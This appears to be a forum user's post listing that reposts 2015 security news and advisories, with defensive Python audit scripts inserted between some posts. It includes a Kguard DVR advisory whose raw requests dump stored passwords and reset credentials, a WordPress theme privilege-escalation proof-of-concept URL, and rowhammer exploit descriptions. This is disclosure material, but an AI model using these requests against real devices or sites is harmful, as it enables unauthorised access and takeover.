Aerosol

Everything posted by Aerosol

  1. A New York City-based private investigator has pled guilty to one charge of conspiracy to commit computer hacking, which carries a maximum sentence of five years. Eric Saldarriaga allegedly hired hackers to access the email accounts of various victims, a Federal Bureau of Investigation (FBI) press release states. Saldarriaga allegedly had the hackers hand over login credentials, so he could access victims' accounts and review their communications. Manhattan U.S. Attorney Preet Bharara said in the release: “Eric Saldarriaga crossed the line as a private investigator by hiring hackers to unlawfully and secretly access over 60 e-mail accounts, including accounts belonging to people he was investigating.” Saldarriaga's victims allegedly included both people in whom his clients were interested as well as individuals in whom he had a personal interest. Source
  2. Attackers are targeting a patched remote code execution vulnerability in Elasticsearch that grants unauthenticated bad guys access through a buggy API. The flaw (CVE-2015-1427) within the world's number two enterprise search engine was patched last month. It relates, as folks at Mitre say, to the Groovy scripting engine in Elasticsearch before versions 1.3.8 and 1.4.3, in which sandbox protections could be bypassed, allowing the execution of arbitrary shell commands with a crafted script. The fixes disable Groovy sandboxing and dynamic script execution, which ElasticSearch developer Clinton Gormley says is a "blow" to Elasticsearch. Texas hacker Jordan Wright (@jw_sec) explained the vulnerability reported by Cisco and Elasticsearch security bod Cameron Morris after he was targeted in attacks. In a post written to alert fellow users he says the patch could be reversed to find hints about how to exploit the flaw. "This vulnerability was not heavily advertised, but it is absolutely critical," Wright says. "In fact, I had one of my own Elasticsearch instances compromised this way, showing this vulnerability is heavily being exploited in the wild. "I won’t provide a full proof-of-concept, but all the pieces are here ... it is pretty straightforward to run whatever commands you want." Developer David Davidson published overnight to GitHub what he says is a functioning proof of concept. There is a "tonne" of publicly-accessible Elasticsearch instances, Wright says. He recommends on Reddit that users check /tmp folders to ensure it is not accessible over the internet. "I've been seeing a ton of attempts to download skiddie DDoS bots via wget to /tmp in the past week or so," he says. Gormley says the company is in the long term examining ways to improve Expressions to become a more-powerful safe "mini-language". Source
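As an added example (not code from the article, from Elasticsearch or from Jordan Wright), here is the check a defender would run against a 1.x node after reading the above: compare the node version with the fixed releases the article names (1.3.8 and 1.4.3) and audit elasticsearch.yml for settings that re-enable what the fix turned off. The setting names script.groovy.sandbox.enabled, script.disable_dynamic and network.host are Elasticsearch 1.x settings as I know them, not taken from the article; both sample configs are constructed.

```python
"""Audit an Elasticsearch 1.x node for the CVE-2015-1427 exposure window."""
import re
from typing import Dict, List, Tuple

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised Elasticsearch version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def is_unpatched_version(text: str) -> bool:
    """True for the versions the advisory wording covers:
    anything before 1.3.8, and 1.4.x before 1.4.3."""
    version = parse_version(text)
    if version[:2] == (1, 4):
        return version < (1, 4, 3)
    return version < (1, 3, 8)


def parse_flat_yaml(text: str) -> Dict[str, str]:
    """Minimal reader for the flat 'key: value' lines of elasticsearch.yml
    (no nesting or lists; enough for the settings audited here)."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip("\"'").lower()
    return settings


def audit_config(config_text: str) -> List[str]:
    """Findings for settings that leave dynamic scripting reachable and the node exposed."""
    s = parse_flat_yaml(config_text)
    findings = []
    if s.get("script.groovy.sandbox.enabled") == "true":
        findings.append("script.groovy.sandbox.enabled: true re-enables the Groovy sandbox the fix disabled")
    if s.get("script.disable_dynamic") == "false":
        findings.append("script.disable_dynamic: false lets scripts arrive inline in API requests")
    host = s.get("network.host")
    if host is None or host == "0.0.0.0":
        # 1.x bound to all interfaces when network.host was left unset
        findings.append("network.host unset or 0.0.0.0: node listens on every interface")
    return findings


def audit_node(version: str, config_text: str) -> List[str]:
    findings = []
    if is_unpatched_version(version):
        findings.append(f"version {version} predates the CVE-2015-1427 fix (1.3.8 / 1.4.3)")
    return findings + audit_config(config_text)


# Constructed sample configs: one left open, one hardened
WEAK_CONFIG = """\
cluster.name: demo
script.groovy.sandbox.enabled: true
script.disable_dynamic: false
network.host: 0.0.0.0
"""

HARDENED_CONFIG = """\
cluster.name: demo
script.groovy.sandbox.enabled: false
script.disable_dynamic: true
network.host: 127.0.0.1
"""

if __name__ == "__main__":
    for label, version, cfg in (("weak", "1.4.2", WEAK_CONFIG), ("hardened", "1.4.3", HARDENED_CONFIG)):
        print(label, audit_node(version, cfg) or ["no findings"])
```

The version check alone is not enough: a node on 1.4.3 with script.groovy.sandbox.enabled set back to true is in the same position as an unpatched one, which is why the audit reports both.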
  3. A ban on online anonymity networks would be "technologically infeasible" and unwise, MPs have been told. Parliamentary advisers said networks such as Tor could be used for criminal ends but also in the public interest. The advice for MPs contradicted the Prime Minister David Cameron, who has said law enforcement should be handed the keys to encrypted communications. One expert said the document showed Mr Cameron's plans to be "noble", but ultimately unworkable. The Parliamentary Office of Science and Technology (Post), which issues advice to MPs, said that there was "widespread agreement that banning online anonymity systems altogether is not seen as an acceptable policy option in the UK".
'Technical challenges'
In a briefing document on the dark net, of which Tor forms a prominent part, it added that, "even if it were, there would be technical challenges". The report, published on Monday 9 March, cited the example of the Chinese government, which attempted to block access to Tor in order to enforce bans on unauthorised websites. In reaction, it said, the body that maintains the network simply added "bridges" that were "very difficult to block", allowing people to continue accessing Tor.
[Image caption: The prime minister has called for encryption to be banned to help stop terrorism]
Speaking in January, following attacks by gunmen in Paris and its surrounding areas, David Cameron said there should be no "means of communication" the security services could not read. He said: "In extremis, it has been possible to read someone's letter, to listen to someone's call to mobile communications. "The question remains, 'Are we going to allow a means of communications where it simply is not possible to do that?' My answer to that question is, 'No, we must not.'" He has also enlisted companies that operate internet search engines, such as Google, Microsoft and Yahoo, to help track down and block images of child abuse.
Whistle-blowing
However, the Post report clarified that the dark web was not indexed by such search engines, limiting the extent to which they would be able to help. Jamie Bartlett, of the think tank Demos, whose book The Dark Net was cited in the report, said that - in theory - he agreed with Mr Cameron that there should not be a place in the dark web for criminals to hide. However, he said that - in practice - the prime minister's plans were shown by the parliamentary document to be "more or less impossible to actually do". He said: "It is about police being able to force people to give up their anonymity when necessary, without taking away the ability to be anonymous online."
Hidden services
The Post provides reports for MPs to offer them independent, non-political advice on highly specialised and complicated issues in science and technology. It does not bind them to any position, but helps inform parliamentary debates and votes on subjects of which many MPs would otherwise have little understanding. In its report, it differentiated between use of the dark web for criminal purposes and for acts in the public interest - such as whistle-blowing. It noted that some people have argued for a network that allowed users to be anonymous, but without Tor hidden services (THS), such as the Silk Road marketplace, which have been used for criminal purposes. "However, THS also benefit non-criminal Tor users because they may add a further layer of user security," the report said. "Sites requiring strong security, like whistle-blowing platforms are offered as THS. "Also, computer experts argue that any legislative attempt to preclude THS from being available in the UK over Tor would be technologically infeasible."
A spokesman for the prime minister did not respond to a request for comment. Source
  4. In one of the more impressive hacks in recent memory, researchers have devised an attack that exploits physical weaknesses in certain types of DDR memory chips to elevate the system rights of untrusted users of Intel-compatible PCs running Linux. The technique, outlined in a blog post published Monday by Google's Project Zero security initiative, works by reversing individual bits of data stored in DDR3 chip modules known as DIMMs. Last year, scientists proved that such "bit flipping" could be accomplished by repeatedly accessing small regions of memory, a feat that—like a magician who transforms a horse into a rabbit—allowed them to change the value of contents stored in computer memory. The research unveiled Monday showed how to fold such bit flipping into an actual attack. "The thing that is really impressive to me in what we see here is in some sense an analog- and manufacturing-related bug that is potentially exploitable in software," David Kanter, senior editor of the Microprocessor Report, told Ars. "This is reaching down into the underlying physics of the hardware, which from my standpoint is cool to see. In essence, the exploit is jumping several layers of the stack." Getting hammered DDR memory is laid out in an array of rows and columns, which are assigned in large blocks to various applications and operating system resources. To protect the integrity and security of the entire system, each large chunk of memory is contained in a "sandbox" that can be accessed only by a given app or OS process. Bit flipping works when a hacker-developed app or process accesses two carefully selected rows of memory hundreds of thousands of times in a tiny fraction of a second. By hammering the two "aggressor" memory regions, the exploit can reverse one or more bits in a third "victim" location. In other words, selected zeros in the victim region will turn into ones or vice versa. The ability to alter the contents of forbidden memory regions has far-reaching consequences. 
It can allow a user or application who has extremely limited system privileges to gain unfettered administrative control. From there, a hacker may be able to execute malicious code or hijack the operations of other users or software programs. Such elevation-of-privilege hacks are especially potent on servers available in data centers that are available to multiple customers. The vulnerability works only on newer types of DDR3 memory and is the result of the ever smaller dimensions of the silicon. With less space between each DRAM cell, it becomes increasingly hard to prevent one cell from interacting electrically with its neighbors. By repeatedly accessing one or more carefully selected memory locations, attackers can exploit this volatility, causing the charge to leak into or out of adjacent cells. With enough accesses, the technique can change the value of a cell. The attack doesn't work against newer DDR4 silicon or DIMMs that contain ECC, short for error correcting code, capabilities. Mark Seaborn, described as a "sandbox builder and breaker," along with reverse engineer Thomas Dullien, developed two "rowhammer" exploits that, when run as unprivileged processes, were able to gain kernel privileges on an x86-64 Linux system. The first exploit ran as a Native Client module on top of Google Chrome. Once Google developers became aware of the exploit, they disallowed the CLFLUSH instruction that's required to make the exploit work. The second exploit, which ran as a normal Linux process and gained access to all physical memory, will be harder to mitigate on existing machines. There are other things that made the exploits impressive. Irene Abezgauz, a product VP at Dyadic Security and an experienced penetration testing professional, told Ars: The attackers didn't identify the specific models of DDR3 that are susceptible to the attack. 
While their proof-of-concept exploits targeted a Linux computer running x86-64 hardware, the same technique would likely work against a variety of platforms. The results are impressive, but for a variety of reasons right now, the attacks appear to be more theoretical than practical. For one, the attack appears to allow only local, rather than remote, exploitation, a limitation that significantly curtails its appeal to real-world hackers. And for another, bit flipping works only against certain pre-determined rows. What's more, rowhammering requires more than 540,000 memory accesses in just 64 milliseconds. Unless refinements are made, the demands could make it impractical for attackers to use the technique to reliably hijack a system. Bit flipping shouldn't be mistaken as a class of memory corruption exploit, such as a buffer overflow or a use-after-free, both of which allow attackers to funnel malicious shell code into protected regions of a computer. Rowhammering, by contrast, allows for escalation of privileges, which while serious, is a much more nuanced type of incursion. Rob Graham, CEO of Errata Security, published this blog post that details additional challenges and technical details. Still, the ability to exploit physical weaknesses in the hardware is a highly novel type of attack that breaks new ground and may not be easy to remedy. "This is not like software, where in theory we can go patch the software and get a patch distributed via Windows update within the next two to three weeks," Kanter, of the Microprocessor Report, said. "If you want to actually fix this problem, we need to go out and replace, on a DIMM by DIMM basis, billions of dollars' worth of DRAM. From a practical standpoint that's not ever going to happen." Source
  5. MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10, 2015

PRODUCT DESCRIPTION
The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical application. Its stylish and streamlined hardware design and excellent performance can be fast moving, competitive and an ideal solution for entry level & distribution channels.

VENDOR REFERENCE: http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527

VULNERABILITY DESCRIPTION

1. Insufficient authentication and authorization

A deficiency in handling authentication and authorization has been found with Kguard 104/108 models. While password-based authentication is used by the ActiveX component to protect the login page, all the communication to the application server at port 9000 allows data to be communicated directly with insufficient or improper authorization. The request HI_SRDK_SYS_USERMNG_GetUserList, for example, will show all the usernames in the system together with their passwords. The below example is an actual unmodified request and response by the server.

REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0
CSeq:6
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:51
3Segment-Num:1
Segment-Seq:1
Data-Length:4

VMCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:6
Return-Code:0
Content-Length:2326
Segment-Num:2
Segment-Seq:1
Data-Length:2240
eric 111222 111222 admin 111222 111222 333444 333444 555666 555666 user4 user5 user6
Segment-Seq:2
Data-Length:4

An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured, this allows mobile devices to access and monitor the cameras at port 18004. An actual unmodified request and response is shown below.

REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0
CSeq:15
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0

VMCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:15
Return-Code:0
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin 111222

The password to this user can be changed easily by executing the HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below and can be saved in memory by executing HI_SRDK_DEV_SaveFlash:

REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0
CSeq:1
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:161
Segment-Num:1
Segment-Seq:1
Data-Length:112
admin.t..|A<.......n(...........111222444.eted!.p.c<.... ... ...TF..............................................

The logs from the application server can confirm that the execution was successful:

[MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!! /home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c 606========================
GetNetworkState:192.168.254.200

Logs from the DVR also show that an existing mobile device that tries to connect on port 18004 with previously stored credentials will fail:

< StreamingServer> [ run] A client(116) connected[2010-09-11 12:30].
< LangtaoCommProto> [ handlePacketBody] Input buffer total length: 60
< LangtaoCommProto> [ handlePacketBody] tlv type: 41
< LangtaoCommProto> [ handlePacketBody] tlv length: 56
< LangtaoCommProto> [ handlePacketBody] Login request received.
< LangtaoCommProto> [ handleLoginReq] User Name: admin Passwrod: 111222
< LangtaoCommProto> [ handleLoginReq] User name and/or password validate fail.
< StreamingServer> [ handleRequest2] Send response to client.
< StreamingServer> [ handleRequest2] Session closed actively.
< StreamingServer> [ run] Handle request fail.
----------------------- SESSION(116) END -----------------------

2. Lack of transport security

The communication to the application server is done by an unprotected ActiveX component that is presented to the browser's initial session. The lack of transport encryption may allow us to exploit possible requests from this component to the application server. This file is named HiDvrOcx.cab. Decompiling the file will allow us to see the libraries being used:

-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf
-rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll

Interestingly, checking the DLL file named HiDvrNet.dll will reveal other types of controls which can be presented to the application server as well:

HI_SRDK_NET_MOBILE_GetOwspAttr
HI_SRDK_NET_MOBILE_SetAttr
HI_SRDK_NET_MOBILE_SetOwspAttr
HI_SRDK_NET_Network_DHCP_Client_GetAttr
HI_SRDK_NET_Network_DHCP_Client_SetAttr
HI_SRDK_NET_Network_GetDNSList
HI_SRDK_NET_Network_GetDefaultGateway
HI_SRDK_NET_Network_GetNetdevAttr
HI_SRDK_NET_Network_GetNetdevName
HI_SRDK_NET_Network_SetDNSList
HI_SRDK_NET_Network_SetDefaultGateway
HI_SRDK_NET_Network_SetNetdevAttr
HI_SRDK_NET_SetDdnsAttr
HI_SRDK_NET_SetEmailAttr
HI_SRDK_NET_SetIppreviewVodAttr
HI_SRDK_NET_SetMctpServerPort
HI_SRDK_NET_SetPppoeAttr
HI_SRDK_NET_SetWebServerPort
HI_SRDK_Open_Device
HI_SRDK_RECORDER_GetPlaybackAttr
HI_SRDK_RECORDER_GetRecordAttr
HI_SRDK_RECORDER_GetRecordSchedule
HI_SRDK_RECORDER_SetPlaybackAttr
HI_SRDK_RECORDER_SetRecordAttr
HI_SRDK_RECORDER_SetRecordSchedule
HI_SRDK_SYS_GetDaylightAttr
HI_SRDK_SYS_GetSysMaintainAttr
HI_SRDK_SYS_GetSystemAttr
HI_SRDK_SYS_SetDaylightAttr
HI_SRDK_SYS_SetSysMaintainAttr
HI_SRDK_SYS_SetSystemAttr
HI_SRDK_SYS_USERMNG_AddGroup
HI_SRDK_SYS_USERMNG_AddUser
HI_SRDK_SYS_USERMNG_DelGroup
HI_SRDK_SYS_USERMNG_DelUser
HI_SRDK_SYS_USERMNG_Disable
HI_SRDK_SYS_USERMNG_Enable
HI_SRDK_SYS_USERMNG_GetAuthorityList
HI_SRDK_SYS_USERMNG_GetGroupList
HI_SRDK_SYS_USERMNG_GetUserList
HI_SRDK_SYS_USERMNG_ModifyGroupInfo
HI_SRDK_SYS_USERMNG_ModifyUserInfo

3. Denial of Service and Command Injection

Input is not sanitized and filtered in some of the fields, which may lead to a potential passive Denial of Service and/or command injection. By altering some requests such as HI_SRDK_NET_SetPppoeAttr, HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or HI_SRDK_NET_Network_SetDefaultGateway, a malicious user may be able to disrupt connectivity to the DVR.

REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0
CSeq:58
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:49
1Segment-Num:1
Segment-Seq:1
Data-Length:2

REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0
CSeq:61
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0

The application server that listens for incoming requests at port 9000 is run by a binary called raysharp_dvr, which suggests that the hardware manufacturer is Zhuhai RaySharp Technology Co. While the purpose of this vulnerability analysis is mainly Kguard-related DVRs, I believe that other devices that use the same firmware by the manufacturer and are rebranded in the market are also vulnerable.

576 root 20696 S ./raysharp_dvr
577 root 20696 S ./raysharp_dvr
578 root 20696 S ./raysharp_dvr
579 root 20696 S ./raysharp_dvr
580 root 20696 S ./raysharp_dvr
581 root 20696 S ./raysharp_dvr
582 root 20696 S ./raysharp_dvr

Timeline:
02/07/2015 - Discovery / PoC
02/09/2015 - Reported to vendor (NR)
Source
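As an added example (not code from the advisory or from Kguard/RaySharp), here is a parser for the MCTP message layout shown in the captures above, plus an audit that flags what the advisory describes: privileged methods arriving without any credential, and a GetUserList response returning accounts in cleartext. The header names in CREDENTIAL_HEADERS are hypothetical, since MCTP as captured defines none; the two sample messages are reconstructed from the advisory's captures with the binary payload bytes omitted.

```python
"""Parser and audit for the MCTP text protocol the DVR speaks on port 9000."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):(.*)$")

# Method names from the advisory's HiDvrNet.dll listing that reveal or change
# security-relevant state; the advisory shows them accepted without authorization.
PRIVILEGED_METHODS = {
    "HI_SRDK_SYS_USERMNG_GetUserList",
    "HI_SRDK_SYS_USERMNG_AddUser",
    "HI_SRDK_SYS_USERMNG_ModifyUserInfo",
    "HI_SRDK_NET_MOBILE_SetOwspAttr",
    "HI_SRDK_NET_SetMctpServerPort",
    "HI_SRDK_NET_Network_SetDefaultGateway",
    "HI_SRDK_DEV_SaveFlash",
}

# Hypothetical header names an authenticated variant of the protocol might carry.
CREDENTIAL_HEADERS = {"Authorization", "Session-Id", "Auth-Token"}


@dataclass
class MctpMessage:
    kind: str                     # "request" or "response"
    method: Optional[str]         # request only
    status: Optional[int]         # response only
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""                # data segment(s) after the first non-header line


def parse_mctp(text: str) -> MctpMessage:
    lines = [line.rstrip("\r") for line in text.strip().splitlines()]
    first = lines[0]
    if first.startswith("REMOTE "):              # "REMOTE <method> MCTP/1.0"
        parts = first.split()
        if len(parts) != 3 or not parts[2].startswith("MCTP/"):
            raise ValueError(f"malformed request line: {first!r}")
        msg = MctpMessage("request", parts[1], None)
    elif first.startswith("MCTP/"):               # "MCTP/1.0 200 OK"
        parts = first.split(maxsplit=2)
        msg = MctpMessage("response", None, int(parts[1]))
    else:
        raise ValueError(f"not an MCTP message: {first!r}")
    body: List[str] = []
    for line in lines[1:]:
        m = HEADER_RE.match(line)
        if m and not body:
            msg.headers[m.group(1)] = m.group(2).strip()
        else:
            body.append(line)   # data, plus any later segment headers, kept verbatim
    msg.body = "\n".join(body)
    return msg


def audit_request(msg: MctpMessage) -> List[str]:
    findings = []
    if (msg.kind == "request" and msg.method in PRIVILEGED_METHODS
            and not (set(msg.headers) & CREDENTIAL_HEADERS)):
        findings.append(f"{msg.method}: privileged method sent with no credential header")
    return findings


def audit_response(msg: MctpMessage, request_method: str) -> List[str]:
    findings = []
    if (msg.kind == "response" and msg.status == 200
            and request_method == "HI_SRDK_SYS_USERMNG_GetUserList" and msg.body):
        findings.append("GetUserList answered 200 with account data in cleartext")
    return findings


# Reconstructed from the advisory's captures; binary bytes omitted (constructed layout)
GET_USER_LIST_REQUEST = """\
REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0
CSeq:6
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:51
Segment-Num:1
Segment-Seq:1
Data-Length:4
"""

GET_USER_LIST_RESPONSE = """\
MCTP/1.0 200 OK
Content-Type:text/HDP
CSeq:6
Return-Code:0
Content-Length:2326
Segment-Num:2
Segment-Seq:1
Data-Length:2240
eric 111222 111222 admin 111222 111222 333444 333444 555666 555666 user4 user5 user6
Segment-Seq:2
Data-Length:4
"""

if __name__ == "__main__":
    req = parse_mctp(GET_USER_LIST_REQUEST)
    resp = parse_mctp(GET_USER_LIST_RESPONSE)
    print(audit_request(req))
    print(audit_response(resp, req.method))
```

Run against a capture of port 9000 traffic, the same two functions give a network monitor a rule set: any privileged method seen on the wire is by construction unauthenticated, so the useful control is not a signature but keeping port 9000 off any network the DVR's users do not fully trust.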
  6. ------------------------------------------------------------------------------
WordPress Fraction Theme 1.1.1 Privilege Escalation
------------------------------------------------------------------------------
[-] Theme Link: http://themeforest.net/item/fraction-multipurpose-news-magazine-theme/8655281
[-] Affected Version: 1.1.1
[-] Vulnerability Description:
This vulnerability allows an attacker to escalate privileges on the site and obtain an admin account, which may lead to a full site takeover. The vulnerability is in /fraction-theme/functions/ajax.php, where there is a function called "ot_save_options":

function ot_save_options() {
    // every request parameter becomes a WordPress option; no capability or nonce check
    $fields = $_REQUEST;
    foreach($fields as $key => $field) {
        if($key!="action") {
            update_option($key,$field);
        }
    }
    die();
}

Passing user input into the update_option function allows an attacker to update options like users_can_register, default_role, etc. This can be accessed via ajax by users and non-users:

add_action('wp_ajax_nopriv_ot_save_options', 'ot_save_options');
add_action('wp_ajax_ot_save_options', 'ot_save_options');

[-] Proof of Concept:
This will enable user registration:
http://localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
[-] Timeline:
09 March - Vendor Notified
09 March - Vendor Replied
10 March - Fix Released
10 March - Public Disclosure
[-] References: http://research.evex.pw/?vuln=8
@evex_1337
Source
  7. Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=284
Full PoC: http://www.exploit-db.com/sploits/36311.tar.gz

This is a proof-of-concept exploit that is able to escape from Native Client's x86-64 sandbox on machines that are susceptible to the DRAM "rowhammer" problem. It works by inducing a bit flip in read-only code so that the code is no longer safe, producing instruction sequences that wouldn't pass NaCl's x86-64 validator. Note that this uses the CLFLUSH instruction, so it doesn't work in newer versions of NaCl where this instruction is disallowed by the validator.

There are two ways to test the exploit program without getting a real rowhammer-induced bit flip:
* Unit testing: rowhammer_escape_test.c can be compiled and run as a Linux executable (instead of as a NaCl executable). In this case, it tests each possible bit flip in its code template, checking that each is handled correctly.
* Testing inside NaCl: The patch "inject_bit_flip_for_testing.patch" modifies NaCl's dyncode_create() syscall to inject a bit flip for testing purposes. This syscall is NaCl's interface for loading code dynamically.

Mark Seaborn mseaborn@chromium.org March 2015
Source
  8. Sources:
http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
https://code.google.com/p/google-security-research/issues/detail?id=283
Full PoC: http://www.exploit-db.com/sploits/36310.tar.gz

This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM "rowhammer" problem. It runs as an unprivileged userland process on x86-64 Linux. It works by inducing bit flips in page table entries (PTEs).

For development purposes, the exploit program has a test mode in which it induces a bit flip by writing to /dev/mem. qemu_runner.py will run the exploit program in test mode in a QEMU VM. It assumes that "bzImage" (in the current directory) is a Linux kernel image that was built with /dev/mem enabled (specifically, with the CONFIG_STRICT_DEVMEM option disabled).

Mark Seaborn mseaborn@chromium.org March 2015
Source
  9. Yeah, sure, "apologies". Let's be serious: they apologised only to try to "remedy" the situation. They realised they had made fools of themselves and damaged their image, and now they are trying to repair it.
  10. Malware analysts have had a measure of success using static mutex values as a fingerprint for detecting and blocking malicious code. These values are used in programming to enable software to synchronize communication between multiple threads or processes, or to determine whether another instance of a program is running already. There’s better reliability in using a mutex object in this way than checking for the presence of a process name, which could change. Malware writers, however, may have caught on to this fingerprinting technique. Lenny Zeltser, a SANS Institute instructor, said a malware sample he was examining dynamically generates the name of a mutex object by using the product ID associated with the software, lessening its predictability and complicating detection. “Given that malware analysts know to look for mutex names for ‘fingerprinting’ malicious software, it’s natural that authors of such programs will start shifting their techniques,” Zeltser said. “The technique that this malware used to generate the mutex name wasn’t especially elaborate, but it made it harder for the defenders to use this attribute for defending or investigating the system.” Malware evasion techniques are the epitome of the cat-and-mouse game between hackers and researchers. The LogPOS point-of-sale malware is a recent example of the constant evolution on the attackers’ side. The malware makes use of a Windows technology called mailslots to create a webserver; additional code is injected into various processes and acts as a client that moves stolen credit card data to the mailslot which then sends it to the attackers’ command and control infrastructure. Last October, academics at the University of California at Santa Barbara, made a plea for defenders to begin working on technology that spots evasive behavior. Security systems, said Giovanni Vigna, director of the Center for Cybersecurity at UCSB, must eventually elicit malicious behavior from malware before it executes. 
“The dynamic of action-reaction is common in the world of information security: The defenders find a way of interfering with the attackers, the attackers adjust tactics, the defenders tweak our methods, the attackers react, etc,” Zeltser said.
The sample
Zeltser studied a malware sample called TreasureHunter and today, in a post on the SANS Internet Storm Center website, he describes how the malware transforms a computer’s specific Windows Product ID into a string that serves as the basis for its mutex. Not all malware samples make use of mutex objects, but those that do have until now hardcoded the name. Backoff, probably the most notorious point-of-sale malware in the wake of the mega Target and Home Depot breaches, named its mutexes in ways that were known to incident responders, Zeltser said. This scenario simplified detection for malware analysts, enabling them to use mutex names as indicators of compromise for Backoff infections, he said. For an attacker, the use of a static, hardcoded mutex name also allows multiple instances of malicious code running on the infected host to refer to the same mutex, Zeltser said. TreasureHunter, he said, is the first time he’s seen malware move away from this static approach. “The author of TreasureHunter decided to use a more sophisticated approach of deriving the name of the mutex based on the system’s Product ID,” Zeltser explained in his post. “This helped the specimen evade detection in situations where incident responders or anti-malware tools attempted to use a static object name as the indicator of compromise.” Source
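As an added example (not code from the article, from SANS ISC or from Lenny Zeltser), here is the defender's side of the shift the article describes: a mutex-name matcher that checks names observed on a host against a static IoC list, the approach that worked for Backoff, and against rules that compute the expected name from host context, which is what a Product-ID-derived name requires. The derivation used is a hypothetical stand-in (a SHA-256 prefix of the Product ID) that only models "the name depends on the host"; the article does not give TreasureHunter's real algorithm. All IoC strings, Product IDs and observed mutex names are constructed.

```python
"""Mutex-name IoC matching: static names versus names derived from host attributes."""
import hashlib
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Set


@dataclass(frozen=True)
class HostContext:
    product_id: str   # Windows Product ID of the host being examined (constructed values below)


# Constructed placeholder names standing in for a static mutex IoC list
STATIC_MUTEX_IOCS: Set[str] = {
    "Global\\CONSTRUCTED_POS_MUTEX_A",
    "CONSTRUCTED_POS_MUTEX_B",
}


def hypothetical_product_id_mutex(ctx: HostContext) -> str:
    """Hypothetical derivation: first 16 hex digits of SHA-256(Product ID).
    Not TreasureHunter's algorithm; it only models a host-dependent name."""
    digest = hashlib.sha256(ctx.product_id.encode("ascii")).hexdigest()
    return "Global\\" + digest[:16]


DerivedRule = Callable[[HostContext], str]
DERIVED_MUTEX_RULES: Dict[str, DerivedRule] = {
    "hypothetical-product-id-mutex": hypothetical_product_id_mutex,
}


def expected_mutex_names(ctx: HostContext, static_iocs: Set[str],
                         derived_rules: Dict[str, DerivedRule]) -> Dict[str, str]:
    """Expand the IoC set for one host: static names plus each derived rule evaluated for ctx."""
    expected = {name: "static" for name in static_iocs}
    for rule_name, derive in derived_rules.items():
        expected[derive(ctx)] = f"derived:{rule_name}"
    return expected


def match_mutexes(observed: Iterable[str], ctx: HostContext,
                  static_iocs: Set[str] = STATIC_MUTEX_IOCS,
                  derived_rules: Dict[str, DerivedRule] = DERIVED_MUTEX_RULES) -> Dict[str, str]:
    """Map each observed mutex name that is an IoC for this host to the rule that matched it."""
    expected = expected_mutex_names(ctx, static_iocs, derived_rules)
    return {name: expected[name] for name in observed if name in expected}


if __name__ == "__main__":
    host = HostContext(product_id="00000-00000-00000-CONSTRUCTED")
    observed = [                                    # constructed handle-enumeration output
        "Global\\CONSTRUCTED_POS_MUTEX_A",          # on the static list
        hypothetical_product_id_mutex(host),        # host-specific name, invisible to static matching
        "Local\\ConstructedBenignAppMutex",         # unrelated application mutex
    ]
    print("static only:", match_mutexes(observed, host, derived_rules={}))
    print("static + derived:", match_mutexes(observed, host))
```

The point of the second lookup is that an IoC can be a function of the host rather than a literal: once the derivation is recovered from a sample, the responder computes the expected name per machine instead of searching for one string everywhere.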
